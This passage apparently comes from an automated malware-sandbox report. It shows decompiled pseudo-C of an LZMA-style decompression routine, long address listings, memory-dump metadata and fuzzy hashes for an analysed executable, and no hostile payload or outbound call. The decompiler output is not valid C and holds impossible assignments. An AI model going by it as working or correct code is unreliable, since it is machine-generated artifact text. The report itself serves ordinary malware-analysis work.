						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                          0x00000000
                                          0x00406f5b
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f84
                                          0x00406f8e
                                          0x00000000
                                          0x00406f61
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x0040704f
                                          0x0040704f
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x0040700d
                                          0x0040700d
                                          0x0040700d
                                          0x004067a9
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x00000000
                                          0x00000000
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x00000000
                                          0x00407195
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00407007
                                          0x00407007
                                          0x00000000
                                          0x00000000
                                          0x00406925
                                          0x00406927
                                          0x0040692a
                                          0x0040699b
                                          0x0040699e
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00000000
                                          0x004069b2
                                          0x0040692c
                                          0x00406930
                                          0x00406933
                                          0x00406935
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x0040694d
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406962
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406972
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00000000
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x0040697d
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x00000000
                                          0x0040698e
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00000000
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406cfd
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00406f91
                                          0x00406f91
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x00000000
                                          0x00407048
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x00000000
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00406c95
                                          0x00406c95
                                          0x00406c99
                                          0x0040715f
                                          0x00000000
                                          0x0040715f
                                          0x00406c9f
                                          0x00406ca2
                                          0x00406ca5
                                          0x00406ca8
                                          0x00406caa
                                          0x00406caa
                                          0x00406caa
                                          0x00406cad
                                          0x00406cb0
                                          0x00406cb3
                                          0x00406cb6
                                          0x00406cb9
                                          0x00406cbc
                                          0x00406cbd
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cbf
                                          0x00406cc2
                                          0x00406cc5
                                          0x00406cc8
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406ccb
                                          0x00406cce
                                          0x00406cd0
                                          0x00406cd0
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x00406f54
                                          0x00407189
                                          0x004071ab
                                          0x004071b1
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x00000000
                                          0x004067b8
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x0040700d
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x004070ea
                                          0x00000000
                                          0x00406f5f

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                          • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                          • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                          • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
